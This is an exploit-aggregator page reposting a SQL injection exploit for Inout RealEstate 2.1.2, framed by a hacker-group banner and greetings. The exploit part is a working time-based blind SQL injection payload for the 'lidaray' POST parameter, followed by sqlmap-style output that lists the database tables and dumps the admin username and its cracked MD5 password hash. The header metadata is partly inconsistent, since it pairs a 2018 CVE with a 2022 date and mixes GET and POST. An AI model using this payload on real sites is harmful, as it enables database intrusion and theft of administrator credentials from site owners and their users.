Advertisement






Inout RealEstate 2.1.2 SQL Injection

CVE Category Price Severity
CVE-2018-5772 CWE-89 $1,000 High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2022-08-15
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080054

Below is a copy:

Inout RealEstate 2.1.2 SQL Injection
                                     C r a C k E r                                    
                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  


               From The Ashes and Dust Rises An Unimaginable crack....          

                                      [ Exploits ]                                    

:  Author   : CraCkEr                                                                  :
  Website  : inoutscripts.com                                                         
  Vendor   : Inout Scripts                                                            
  Software : Inout RealEstate 2.1.2           Inout RealEstate is an easy, flexible   
  Vuln Type: Remote SQL Injection             and simple property management solution 
  Method   : GET                              ideal for business start-ups            
  Impact   : Database Access                                                          
                                                                                      
 
                              B4nks-NET irc.b4nks.tk #unix                             

:                                                                                        :
  Release Notes:                                                                        
                                                                           
  Typically used for remotely exploitable vulnerabilities that can lead to              
  system compromise.                                                                    
                                                                                        

                                                                                      


Greets:

    The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL   
Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7
       
CryptoJob (Twitter) twitter.com/CryptozJob
   

                                     CraCkEr 2022                                    



POST parameter 'lidaray' is vulnerable.

---
Parameter: lidaray (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: lidaray=20MKTTVT24' AND (SELECT 1823 FROM (SELECT(SLEEP(5)))Caim) AND 'bHOb'='bHOb
---

[INFO] the back-end DBMS is MySQL

[INFO] fetching current database
current database: 'inout_realestate'


fetching tables for database: 'inout_realestate'

Database: inout_realestate
[45 tables]
+--------------------------------+
| adcode                         |
| admin_account                  |
| admin_payment_details          |
| agent_list_request_to_user     |
| broker_citymap                 |
| broker_rate                    |
| broker_review                  |
| brokerabusereport              |
| category_property              |
| chat_details                   |
| chat_messages                  |
| checkout_ipn                   |
| countries                      |
| custom_field                   |
| detail_statistics_list         |
| email_templates                |
| enquiry_status                 |
| forgetpassword                 |
| inout_ipns                     |
| invoicegen                     |
| languages                      |
| list_brokermap                 |
| list_images                    |
| list_main                      |
| listopenhouse                  |
| normal_statistics_list         |
| paymentdetailstat              |
| ppc_currency                   |
| public_side_media_detail       |
| public_slide_images            |
| pupularsiarchlist              |
| recentsearchlist               |
| settings                       |
| sold_listing                   |
| soldlistadd                    |
| traveller_bank_deposit_history |
| user_broker_licenses           |
| user_broker_registration       |
| user_email_verification        |
| user_list_agent_request        |
| user_registration              |
| user_wishlist_mapping          |
| userabusereport                |
| userlistactive                 |
| wish_list                      |
+--------------------------------+


[INFO] fetching columns for table 'admin_account' in database 'inout_realestate'

Database: inout_realestate
Table: admin_account
[6 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| admin_type | tinyint(4)   |
| id         | int(11)      |
| logouttime | int(11)      |
| password   | varchar(255) |
| status     | tinyint(4)   |
| username   | varchar(200) |
+------------+--------------+


[INFO] fetching entries of column(s) 'admin_type,id,password,username' for table 'admin_account' in database 'inout_realestate'

Database: inout_realestate
Table: admin_account
[1 entry]
+----+----------+------------------------------------------+------------+
| id | username | password                                 | admin_type |
+----+----------+------------------------------------------+------------+
| 1  | admin    | 21232f297a57a5a743894a0e4a801fc3 (admin) | 0          |
+----+----------+------------------------------------------+------------+


[-] Done

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.